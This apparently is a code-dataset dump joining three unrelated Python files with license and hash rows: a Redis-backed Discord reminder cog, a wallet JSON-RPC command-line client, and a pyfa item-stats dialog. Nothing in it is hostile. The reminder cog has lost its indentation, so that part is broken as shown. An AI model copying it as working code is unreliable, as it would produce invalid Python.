await self.redis.lrem(f"{gid}:Remindme:Person:{uid}",1,mid)
await self.redis.hdel(f"{gid}:Remindme:member",mid)
await self.redis.hdel(f"{gid}:Remindme:data", mid)
await self.redis.hdel(f"{gid}:Remindme:channel", mid)
await self.redis.hdel(f"{gid}:Remindme:time", mid)
async def timer(self): #Checking if there is remindme task that bot lost during shutdown/restart (losing data from memory)
await asyncio.sleep(5)#give it a moment..
utils.prYellow("Remindme Timer start")
guild_list = list(self.bot.guilds)
for guild in guild_list: #checking each guild
get_time = datetime.now().timestamp()
utils.prLightPurple(f"Checking {guild.name}")
data = await self.redis.hgetall(f"{guild.id}:Remindme:data")
if data: #if there is exist data then get info about info about channel
author_list = await self.redis.hgetall(f"{guild.id}:Remindme:member")
channel = await self.redis.hgetall(f"{guild.id}:Remindme:channel")
time = await self.redis.hgetall(f"{guild.id}:Remindme:time")
for mid in data: #run every Id in data and return timer
try:
                        if author_list.get(mid): #to be compatible with old legacy.
check_str = f"{guild.id}:Remindme:Person:{author_list.get(mid)}"
if mid not in await self.redis.lrange(check_str,0,-1):
utils.prRed("RM:No longer in Person, so delete....")
await self.clear(guild.id,author_list.get(mid),mid)
continue #Somehow if it cant delete old one we might do it here.
chan = guild.get_channel(int(channel[mid]))
author = guild.get_member(int(author_list[mid]))
#Once Legacy will be gone, there might be some leftover
#such as one that was set really long.. that last years...
#those will be likely to be delete.
remain_time = int(time[mid]) - int(get_time)
utils.prYellow(f"Time: {remain_time},Channel: {channel[mid]}, Message: {data[mid]}")
if remain_time <= 0:
if chan:
await chan.send(f"{author.mention}\nI am deeply"
" sorry for not reminding you earlier!"
" You were reminded of the following:\n"
f"```fix\n {data[mid]} \n```")
await self.clear(guild.id,author.id,mid)
else:
if author_list.get(mid):
task = self.loop.create_task(self.time_send(
chan,author,data[mid],
remain_time,guild.id,mid))
else: #Old legacy... Soon to be delete once confirm
task = self.loop.create_task(self.old_time_send(
channel[mid],data[mid],
remain_time,guild.id,mid))
loop_list[mid] = task
except:
utils.prRed(traceback.format_exc())
async def time_send(self,channel,author,msg,time,guild,mid):
await asyncio.sleep(time)
#if it not in list, then dont send it as it is likely cancel.
if channel and loop_list.get(mid): #Making sure it not in list...
await self.send_msg(channel,author,msg)
await self.clear(guild,author.id,mid)
async def old_time_send(self,channel,msg,time,guild,x): #Legacy. Will delete
await asyncio.sleep(time)
channel = self.bot.get_channel(int(channel))
if channel:
await channel.send(msg)
await self.redis.hdel("{}:Remindme:data".format(guild), x)
await self.redis.hdel("{}:Remindme:channel".format(guild), x)
await self.redis.hdel("{}:Remindme:time".format(guild), x)
async def send_msg(self,ctx,author,msg):
await ctx.send(f"{author.mention} Reminder:\n```fix\n{msg}\n```")
@commands.command(hidden = True)
async def setTimezoneRemind(self,ctx,timez):
try:
#so we are checking if this timezone exists,
#if no error, we are clear.
            #I will make this command read more sensibly (and prettier)
            #when I get a chance to rewrite it.... #TODO
if timez.lower() == "none":
await self.redis.delete("Profile:{}:Remind_Timezone".format(ctx.author.id))
return await ctx.send("I have removed timezone in your profile!")
tz = pytz.timezone(timez)
await self.redis.set("Profile:{}:Remind_Timezone".format(ctx.author.id),tz.zone)
return await ctx.send("Timezone set for your remind only!",delete_after = 30)
except pytz.UnknownTimeZoneError:
await ctx.send("There is no such a timezone, please check a list from there <https://en.wikipedia.org/wiki/List_of_tz_database_time_zones> under **TZ database Name**",delete_after = 30)
@commands.command(hidden = True)
@commands.has_permissions(manage_guild = True)
async def setServerTimezoneRemind(self,ctx,timez):
try:
#Similar as setTimezoneRemind ^^^
if timez.lower() == "none":
await self.redis.delete("{}:Remindme:zone".format(ctx.guild.id))
return await ctx.send("I have removed timezone in the server overall!")
tz = pytz.timezone(timez)
await self.redis.set(f"{ctx.guild.id}:Remindme:zone",tz.zone)
return await ctx.send("Timezone set for your server!",delete_after = 30)
except pytz.UnknownTimeZoneError:
await ctx.send("There is no such a timezone, please check a list from there <https://en.wikipedia.org/wiki/List_of_tz_database_time_zones> under **TZ database Name**",delete_after = 30)
async def split_time(self,ctx,t):
t = t.replace(".",":")
t = t.split(":")
if all(x.isdigit() for x in t) is False:
await self.bot.say(ctx,content = "You enter the format wrong! It should be look like this {}remindtime hh:mm:ss message".format(ctx.prefix))
return None
return [int(x) for x in t] #Returning them but first make sure its int!
@commands.command(hidden=True,pass_context=True,aliases=["rt"])
async def remindtime(self,ctx,get_time,*,message=""):
#Split them and check if they are valid.
time = await self.split_time(ctx, get_time)
if time is None: return
if len(time) == 1:
time.append(0)
time.append(0)
elif len(time) == 2:
time.append(0)
if 0 > time[0] or time[0] > 23 or 0 > time[1] or time[1] > 59 or 0 > time[2] or time[2] > 59:
return await self.bot.say(ctx,content = "You enter the number out of range than they should!")
#we are grabbing timezone from user set, if user didnt set,
#it will return None, and when we create timezone,
#it will auto select UTC format.
tz = await self.redis.get(f"Profile:{ctx.author.id}:Remind_Timezone")
if tz is None:
tz = await self.redis.get(f"{ctx.guild.id}:Remindme:zone")
timez = pytz.timezone(tz or "UTC") #if none, then UTC default.
time_set = datetime.now(timez).replace(hour = time[0],
minute = time[1],
second = time[2])
time_now = datetime.now(timez)
delta_time = time_set - time_now
if time_set < time_now:
delta_time += timedelta(days=1)
utils.prGreen(ctx)
await self.remindme_base(ctx,
str(timedelta(seconds=int(delta_time.total_seconds())))
,message=message)
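    # Sketch of the wall-clock math above (kept as a comment; UTC assumed,
    # values illustrative): asking for 06:00 when it is already 18:30 gives
    # a negative delta, so one day is added and the reminder fires 11h30m later:
    #     time_set = datetime.now(tz).replace(hour=6, minute=0, second=0)
    #     delta_time = time_set - datetime.now(tz)
    #     if time_set < datetime.now(tz): delta_time += timedelta(days=1)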
@commands.command(hidden=True,pass_context=True,aliases=["rm"])
async def remindme(self,ctx,get_time,*,message=""):
await self.remindme_base(ctx,get_time,message=message)
async def remindme_base(self,ctx,get_time,*,message=""):
#Split them and check if they are valid.
time = await self.split_time(ctx,get_time)
if time is None: return
remind_time = 0
msg = "Time set "
if len(time) == 3:
remind_time += time[0]*3600 + time[1]*60 + time[2]
msg += "{} hours {} minute {} second".format(time[0],time[1],time[2])
elif len(time) == 2:
remind_time += time[0]*60 + time[1]
msg += "{} minute {} second".format(time[0],time[1])
else:
remind_time += time[0]
msg += "{} second".format(time[0])
if not message: message = "unspecified reminder"
rid = None
if remind_time >= 60:
#if it more than 1 min, then add id so it can remind you in cases
#bot goes down...
time = datetime.now().timestamp() + remind_time
#making ID of Message, User/Member, Guild
print(ctx)
mid = ctx.message.id
uid = ctx.author.id
gid = ctx.guild.id
cid = ctx.channel.id
#we will be using idea as LINK-LIST where we will push msg ID to tail
#This allow to keep as in order for ID so we can cancel when need
rid = await self.redis.rpush(f"{gid}:Remindme:Person:{uid}",mid)
#Setting MSGID to UserID, so we can find who responsiblity for this
await self.redis.hset(f"{gid}:Remindme:member",mid,uid)
await self.redis.hset(f"{gid}:Remindme:data",mid,message)
await self.redis.hset(f"{gid}:Remindme:channel",mid,cid)
await self.redis.hset(f"{gid}:Remindme:time",mid,int(time))
msg = f"{msg}\nID: {rid}" if rid else msg
await ctx.send(msg,delete_after=30)
task = self.loop.create_task( self.time_send(ctx.channel, ctx.author,
message, remind_time,
ctx.guild.id, str(ctx.message.id)))
loop_list[str(ctx.message.id)] = task
@commands.command(aliases = ["rl"], hidden = True)
async def remindlist(self, ctx ):
#There we will show a list of user's ID reminder.
uid = ctx.author.id
gid = ctx.guild.id
current_time = datetime.now().timestamp()
id_list = await self.redis.lrange(f"{gid}:Remindme:Person:{uid}",0,-1)
data_list = await self.redis.hgetall(f"{gid}:Remindme:data")
time_list = await self.redis.hgetall(f"{gid}:Remindme:time")
if not any(id_list): return await ctx.send("You haven't set any reminder!")
id_col = time_col = msg_col = ""
for i, rid in enumerate(id_list,start = 1):
old_time = time_list.get(rid,None)
if old_time is None: continue #TODO TEMP FIX
remain_time = int(old_time) - current_time
hold = [-1,-1,-1]
if remain_time >= 3600:
hold[0] = remain_time/3600 #hours
                remain_time %= 3600 #get remainder min
if remain_time >= 60: #if min leftover
hold[1] = remain_time/60 #min
remain_time %= 60 #get remainder second
hold[2] = remain_time
ft = ["h","m","s"]
#we will then convert them to time message (5H,2M) etc.
#Cast int to cut off decimal
rtmsg = " ".join(f"{int(hold[i])}{ft[i]}" for i in range(3) if hold[i] != -1 )
#now we will set message, with 30 char of "data" to remind user
msg = data_list[rid]
id_col += f"{i}\n"
time_col += f"{rtmsg}\n"
msg_col += f"{msg[:30]}"
msg_col += "...\n" if len(msg) > 30 else "\n"
#set up embeds and add each to each field then send
e = discord.Embed()
e.add_field(name = "ID",value = id_col)
e.add_field(name = "Time Remain",value = time_col)
e.add_field(name = "Message",value = msg_col)
await ctx.send(embed = e)
@commands.command(aliases = ["rc"], hidden = True)
async def remindcancel(self, ctx, raw_rid:commands.Greedy[int],
is_all:str=""):
#We will just assume user know what they are doing lol
gid = ctx.guild.id
uid = ctx.author.id
if is_all == "all":
raw_len = await self.redis.llen(f"{gid}:Remindme:Person:{uid}")
            raw_rid = [x for x in range(1, raw_len + 1)] #IDs shown to users are 1-based
if len(raw_rid) == 0:
return await ctx.send("You need to enter IDs (or \"all\")!")
raw_rid = sorted(raw_rid, reverse = True) #Sorting and in reverse
#Just in case user enter 1 3 then realized need to include 2.
for ri in raw_rid:
#First we will get what element it is at. Index start at 0 duh.
rid = await self.redis.lindex(f"{gid}:Remindme:Person:{uid}",ri-1)
#if we get none, out of range!
if rid is None:
return await ctx.send("Out of range!", delete_after = 30)
#Since we are here, then that mean it is inside, and we will just pop it
await self.clear(gid,uid,rid) #Clear up from DB
await ctx.send("Done.\nNote: Any ID after you enter will go down by 1")
def setup(bot):
bot.add_cog(Remind(bot))
|
mit
| 6,257,882,285,061,678,000
| 49.463918
| 197
| 0.55383
| false
| 3.744263
| false
| false
| false
|
crypticmac/McGregor
|
contrib/bitrpc/bitrpc.py
|
1
|
9665
|
from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:9332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:9332")
cmd = sys.argv[1].lower()
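# Example invocation (assumes a daemon listening on 127.0.0.1:9332 as above):
#   python bitrpc.py getbalance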
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a McGregor address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a McGregor address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
            print access.getwork(data)
        except:
            print access.getwork()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
|
mit
| -8,488,040,174,819,469,000
| 27.679525
| 101
| 0.568546
| false
| 3.944898
| false
| false
| false
|
Ebag333/Pyfa
|
gui/itemStats.py
|
1
|
50776
|
# =============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of pyfa.
#
# pyfa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pyfa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyfa. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
import re
import os
import csv
import sys
import subprocess
import wx
import wx.html
import wx.lib.mixins.listctrl as listmix
import config
from eos.types import Fit, Ship, Citadel, Module, Skill, Booster, Implant, Drone, Mode, Fighter
from service.market import Market
from service.attribute import Attribute
import gui.mainFrame
from gui.bitmapLoader import BitmapLoader
from gui.utils.numberFormatter import formatAmount
from gui.contextMenu import ContextMenu
class ItemStatsDialog(wx.Dialog):
counter = 0
def __init__(
self,
victim,
fullContext=None,
pos=wx.DefaultPosition,
size=wx.DefaultSize,
maximized=False
):
wx.Dialog.__init__(
self,
gui.mainFrame.MainFrame.getInstance(),
wx.ID_ANY,
title="Item stats",
pos=pos,
size=size,
style=wx.CAPTION | wx.CLOSE_BOX | wx.MINIMIZE_BOX | wx.MAXIMIZE_BOX | wx.RESIZE_BORDER | wx.SYSTEM_MENU
)
empty = getattr(victim, "isEmpty", False)
if empty:
self.Hide()
self.Destroy()
return
srcContext = fullContext[0]
try:
itmContext = fullContext[1]
except IndexError:
itmContext = None
item = getattr(victim, "item", None) if srcContext.lower() not in (
"projectedcharge",
"fittingcharge"
) else getattr(victim, "charge", None)
if item is None:
sMkt = Market.getInstance()
item = sMkt.getItem(victim.ID)
victim = None
self.context = itmContext
if item.icon is not None:
before, sep, after = item.icon.iconFile.rpartition("_")
iconFile = "%s%s%s" % (before, sep, "0%s" % after if len(after) < 2 else after)
itemImg = BitmapLoader.getBitmap(iconFile, "icons")
if itemImg is not None:
self.SetIcon(wx.IconFromBitmap(itemImg))
self.SetTitle("%s: %s%s" % ("%s Stats" % itmContext if itmContext is not None else "Stats", item.name,
" (%d)" % item.ID if config.debug else ""))
self.SetMinSize((300, 200))
if "wxGTK" in wx.PlatformInfo: # GTK has huge tab widgets, give it a bit more room
self.SetSize((580, 500))
else:
self.SetSize((550, 500))
# self.SetMaxSize((500, -1))
self.mainSizer = wx.BoxSizer(wx.VERTICAL)
self.container = ItemStatsContainer(self, victim, item, itmContext)
self.mainSizer.Add(self.container, 1, wx.EXPAND)
if "wxGTK" in wx.PlatformInfo:
self.closeBtn = wx.Button(self, wx.ID_ANY, u"Close", wx.DefaultPosition, wx.DefaultSize, 0)
self.mainSizer.Add(self.closeBtn, 0, wx.ALL | wx.ALIGN_RIGHT, 5)
self.closeBtn.Bind(wx.EVT_BUTTON, self.closeEvent)
self.SetSizer(self.mainSizer)
self.parentWnd = gui.mainFrame.MainFrame.getInstance()
dlgsize = self.GetSize()
psize = self.parentWnd.GetSize()
ppos = self.parentWnd.GetPosition()
ItemStatsDialog.counter += 1
self.dlgOrder = ItemStatsDialog.counter
counter = ItemStatsDialog.counter
dlgStep = 30
if counter * dlgStep > ppos.x + psize.width - dlgsize.x or counter * dlgStep > ppos.y + psize.height - dlgsize.y:
ItemStatsDialog.counter = 1
dlgx = ppos.x + counter * dlgStep
dlgy = ppos.y + counter * dlgStep
if pos == wx.DefaultPosition:
self.SetPosition((dlgx, dlgy))
else:
self.SetPosition(pos)
if maximized:
self.Maximize(True)
else:
if size != wx.DefaultSize:
self.SetSize(size)
self.parentWnd.RegisterStatsWindow(self)
self.Show()
self.Bind(wx.EVT_CLOSE, self.closeEvent)
self.Bind(wx.EVT_ACTIVATE, self.OnActivate)
def OnActivate(self, event):
self.parentWnd.SetActiveStatsWindow(self)
def closeEvent(self, event):
if self.dlgOrder == ItemStatsDialog.counter:
ItemStatsDialog.counter -= 1
self.parentWnd.UnregisterStatsWindow(self)
self.Destroy()
class ItemStatsContainer(wx.Panel):
def __init__(self, parent, stuff, item, context=None):
wx.Panel.__init__(self, parent)
sMkt = Market.getInstance()
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.nbContainer = wx.Notebook(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0)
mainSizer.Add(self.nbContainer, 1, wx.EXPAND | wx.ALL, 2)
if item.traits is not None:
self.traits = ItemTraits(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.traits, "Traits")
self.desc = ItemDescription(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.desc, "Description")
self.params = ItemParams(self.nbContainer, stuff, item, context)
self.nbContainer.AddPage(self.params, "Attributes")
items = sMkt.getVariationsByItems([item])
if len(items) > 1:
self.compare = ItemCompare(self.nbContainer, stuff, item, items, context)
self.nbContainer.AddPage(self.compare, "Compare")
self.reqs = ItemRequirements(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.reqs, "Requirements")
self.effects = ItemEffects(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.effects, "Effects")
if stuff is not None:
self.affectedby = ItemAffectedBy(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.affectedby, "Affected by")
self.nbContainer.Bind(wx.EVT_LEFT_DOWN, self.mouseHit)
self.SetSizer(mainSizer)
self.Layout()
def __del__(self):
pass
def mouseHit(self, event):
tab, _ = self.nbContainer.HitTest(event.Position)
if tab != -1:
self.nbContainer.SetSelection(tab)
class AutoListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin, listmix.ListRowHighlighter):
def __init__(self, parent, ID, pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
listmix.ListRowHighlighter.__init__(self)
class AutoListCtrlNoHighlight(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin, listmix.ListRowHighlighter):
def __init__(self, parent, ID, pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
class ItemTraits(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(mainSizer)
self.traits = wx.html.HtmlWindow(self)
self.traits.SetPage(item.traits.traitText)
mainSizer.Add(self.traits, 1, wx.ALL | wx.EXPAND, 0)
self.Layout()
class ItemDescription(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(mainSizer)
bgcolor = wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW)
fgcolor = wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOWTEXT)
self.description = wx.html.HtmlWindow(self)
if not item.description:
return
desc = item.description.replace("\n", "<br>")
# Strip font tags
desc = re.sub("<( *)font( *)color( *)=(.*?)>(?P<inside>.*?)<( *)/( *)font( *)>", "\g<inside>", desc)
# Strip URLs
desc = re.sub("<( *)a(.*?)>(?P<inside>.*?)<( *)/( *)a( *)>", "\g<inside>", desc)
desc = "<body bgcolor='" + bgcolor.GetAsString(wx.C2S_HTML_SYNTAX) + "' text='" + fgcolor.GetAsString(
wx.C2S_HTML_SYNTAX) + "' >" + desc + "</body>"
self.description.SetPage(desc)
mainSizer.Add(self.description, 1, wx.ALL | wx.EXPAND, 0)
self.Layout()
class ItemParams(wx.Panel):
def __init__(self, parent, stuff, item, context=None):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.paramList = AutoListCtrl(self, wx.ID_ANY,
style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)
mainSizer.Add(self.paramList, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.toggleView = 1
self.stuff = stuff
self.item = item
self.attrInfo = {}
self.attrValues = {}
self._fetchValues()
self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
mainSizer.Add(self.m_staticline, 0, wx.EXPAND)
bSizer = wx.BoxSizer(wx.HORIZONTAL)
self.totalAttrsLabel = wx.StaticText(self, wx.ID_ANY, u" ", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.totalAttrsLabel, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT)
self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle view mode", wx.DefaultPosition, wx.DefaultSize,
0)
bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.exportStatsBtn = wx.ToggleButton(self, wx.ID_ANY, u"Export Item Stats", wx.DefaultPosition, wx.DefaultSize,
0)
bSizer.Add(self.exportStatsBtn, 0, wx.ALIGN_CENTER_VERTICAL)
if stuff is not None:
self.refreshBtn = wx.Button(self, wx.ID_ANY, u"Refresh", wx.DefaultPosition, wx.DefaultSize, wx.BU_EXACTFIT)
bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshValues)
mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)
self.PopulateList()
self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)
self.exportStatsBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ExportItemStats)
def _fetchValues(self):
if self.stuff is None:
self.attrInfo.clear()
self.attrValues.clear()
self.attrInfo.update(self.item.attributes)
self.attrValues.update(self.item.attributes)
elif self.stuff.item == self.item:
self.attrInfo.clear()
self.attrValues.clear()
self.attrInfo.update(self.stuff.item.attributes)
self.attrValues.update(self.stuff.itemModifiedAttributes)
elif self.stuff.charge == self.item:
self.attrInfo.clear()
self.attrValues.clear()
self.attrInfo.update(self.stuff.charge.attributes)
self.attrValues.update(self.stuff.chargeModifiedAttributes)
# When item for stats window no longer exists, don't change anything
else:
return
def UpdateList(self):
self.Freeze()
self.paramList.ClearAll()
self.PopulateList()
self.Thaw()
self.paramList.resizeLastColumn(100)
def RefreshValues(self, event):
self._fetchValues()
self.UpdateList()
event.Skip()
def ToggleViewMode(self, event):
self.toggleView *= -1
self.UpdateList()
event.Skip()
def ExportItemStats(self, event):
exportFileName = self.item.name + " (" + str(self.item.ID) + ").csv"
saveFileDialog = wx.FileDialog(self, "Save CSV file", "", exportFileName,
"CSV files (*.csv)|*.csv", wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if saveFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user hit cancel...
with open(saveFileDialog.GetPath(), "wb") as exportFile:
writer = csv.writer(exportFile, delimiter=',')
writer.writerow(
[
"ID",
"Internal Name",
"Friendly Name",
"Modified Value",
"Base Value",
]
)
for attribute in self.attrValues:
try:
attribute_id = self.attrInfo[attribute].ID
except (KeyError, AttributeError):
attribute_id = ''
try:
attribute_name = self.attrInfo[attribute].name
except (KeyError, AttributeError):
attribute_name = attribute
try:
attribute_displayname = self.attrInfo[attribute].displayName
except (KeyError, AttributeError):
attribute_displayname = ''
try:
attribute_value = self.attrInfo[attribute].value
except (KeyError, AttributeError):
attribute_value = ''
try:
attribute_modified_value = self.attrValues[attribute].value
except (KeyError, AttributeError):
attribute_modified_value = self.attrValues[attribute]
writer.writerow(
[
attribute_id,
attribute_name,
attribute_displayname,
attribute_modified_value,
attribute_value,
]
)
def PopulateList(self):
self.paramList.InsertColumn(0, "Attribute")
self.paramList.InsertColumn(1, "Current Value")
if self.stuff is not None:
self.paramList.InsertColumn(2, "Base Value")
self.paramList.SetColumnWidth(0, 110)
self.paramList.SetColumnWidth(1, 90)
if self.stuff is not None:
self.paramList.SetColumnWidth(2, 90)
self.paramList.setResizeColumn(0)
self.imageList = wx.ImageList(16, 16)
self.paramList.SetImageList(self.imageList, wx.IMAGE_LIST_SMALL)
names = list(self.attrValues.iterkeys())
names.sort()
idNameMap = {}
idCount = 0
for name in names:
info = self.attrInfo.get(name)
att = self.attrValues[name]
valDefault = getattr(info, "value", None)
valueDefault = valDefault if valDefault is not None else att
val = getattr(att, "value", None)
value = val if val is not None else att
if info and info.displayName and self.toggleView == 1:
attrName = info.displayName
else:
attrName = name
if info and config.debug:
attrName += " ({})".format(info.ID)
if info:
if info.icon is not None:
iconFile = info.icon.iconFile
icon = BitmapLoader.getBitmap(iconFile, "icons")
if icon is None:
icon = BitmapLoader.getBitmap("transparent16x16", "gui")
